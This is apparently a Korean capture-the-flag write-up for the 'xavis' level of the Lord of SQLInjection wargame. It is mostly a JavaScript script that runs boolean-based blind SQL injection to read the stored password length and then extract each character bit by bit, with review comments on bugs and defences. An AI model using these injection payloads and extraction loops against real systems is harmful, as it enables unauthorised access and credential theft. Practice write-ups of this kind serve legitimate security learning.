
 

반복문 도는 게 조금 이상한데 이런 식으로 하면 된다.

 

 with "los Xavis"

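/**
 * Send one GET request and resolve to the response body as text.
 *
 * The statement runs further down call this once per probe and look for a
 * fixed marker string in the returned HTML, so the only thing this helper
 * has to do is deliver the page body unchanged.
 *
 * The listing as published had lost the `:` between every option key and
 * its value, which made the object literal unparseable; the keys and values
 * below are the ones from the page, with the separators restored.
 *
 * @param {string} url - Address to request; passed through `encodeURI`, so
 *   spaces become `%20` while quotes and `=` are left as written.
 * @param {string} cookies - Value placed in the `cookies` request header.
 * @returns {Promise<string>} Body of the response decoded as text.
 */
const hack = async (url, cookies) => {
    const response = await fetch(encodeURI(url), {
        "headers": {
            "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
            "accept-language": "ko-KR,ko;q=0.9",
            // NOTE(review): the standard request header is `Cookie`, and a
            // browser does not let script set it. This `cookies` header is
            // an unrelated custom header; the session is carried by
            // `credentials: "include"` below.
            "cookies": cookies
        },
        "referrer": "https://los.rubiya.kr/gate.php",
        "referrerPolicy": "strict-origin-when-cross-origin",
        "body": null,
        "method": "GET",
        "mode": "cors",
        "credentials": "include"
    });

    // Awaiting the fetch directly replaces the original await-plus-.then() mix.
    return response.text();
};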
 
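// Step 1 of the write-up: find the length of the stored pw value.
//
// Each request changes only the integer compared with length(pw). The page
// is treated as a yes/no signal: the "<h2>Hello admin</h2>" heading is
// present when the condition held and absent otherwise. That signal exists
// only if the server puts the raw `pw` parameter into its query text
// (presumably by string concatenation; the server code is not shown here).
// Binding `pw` as a query parameter would make the whole value plain data.
//
// Seen from the server, this is up to 100 back-to-back GETs to one script
// whose query string differs only in a counter, a pattern request logs and
// rate limits can pick out.
//
// The published listing had lost the `)` that closes indexOf(...), leaving
// the `if` unbalanced; the check below is the intended "marker found" test.
let pw_length = 0;
for (let i = 0; i < 100; i++) {
    // NOTE(review): `document.cookies` is not a DOM property (the cookie
    // string is `document.cookie`), so this argument evaluates to undefined.
    const res = await hack(`https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw=1' or length(pw)=${i} -- ` , document.cookies);
    if (res.includes("<h2>Hello admin</h2>")) {
        pw_length = i;
        break;
    }
}
console.log(`pw_length : ${pw_length}`);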
 
 
 
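// Step 2 of the write-up: find how many binary digits the numeric code of
// the first pw character has. The later loop reuses this as the fixed width
// for every character, so it assumes all characters fit in the same width
// (TODO confirm; only the first character is measured here).
//
// As in the original there is no `break`: all 99 values are requested and
// byte_length keeps the last width for which the marker heading appeared.
//
// The published listing had lost the `)` that closes indexOf(...); the
// condition below restores the intended "marker found" test.
let byte_length = 0;
for (let i = 1; i < 100; i++) {
    // NOTE(review): `document.cookies` evaluates to undefined; the DOM
    // property is `document.cookie`.
    const res = await hack(`https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw=1' or length(bin(ord(substr(pw,1,1))))=${i} -- ` , document.cookies);
    if (res.includes("<h2>Hello admin</h2>")) {
        byte_length = i;
        console.log(`byte_length : ${byte_length}`);
    }
}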
 
 
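// Step 3 of the write-up: rebuild pw one character at a time, one binary
// digit per request. For character i, the code is left-padded to
// byte_length digits and digit j is compared with 1. The marker heading in
// the response is read as "digit is 1", its absence as "digit is 0".
//
// Total traffic is pw_length * byte_length requests, each differing from
// the previous one only in two small integers. A flood of near-identical
// GETs to one script from one session is the server-side footprint of this
// kind of extraction. Answering with the same page whether or not the
// injected condition holds removes the signal; binding `pw` as a query
// parameter removes the injection itself.
//
// The published listing had lost the `)` that closes indexOf(...); the
// condition below restores the intended "marker found" test.
let password = "";
let bit = "";
for (let i = 1; i <= pw_length; i++) {
    for (let j = 1; j <= byte_length; j++) {
        // NOTE(review): `document.cookies` evaluates to undefined; the DOM
        // property is `document.cookie`.
        const res = await hack(`https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw=1' or substr(lpad(bin(ord(substr(pw,${i},1))),${byte_length},0),${j},1)=1 -- `, document.cookies);
        bit += res.includes("<h2>Hello admin</h2>") ? "1" : "0";
    }
    // The collected digits form a base-2 number; turn it back into a character.
    password += String.fromCharCode(Number.parseInt(bit, 2));
    console.log(`[*] password : ${password}`);
    bit = "";
}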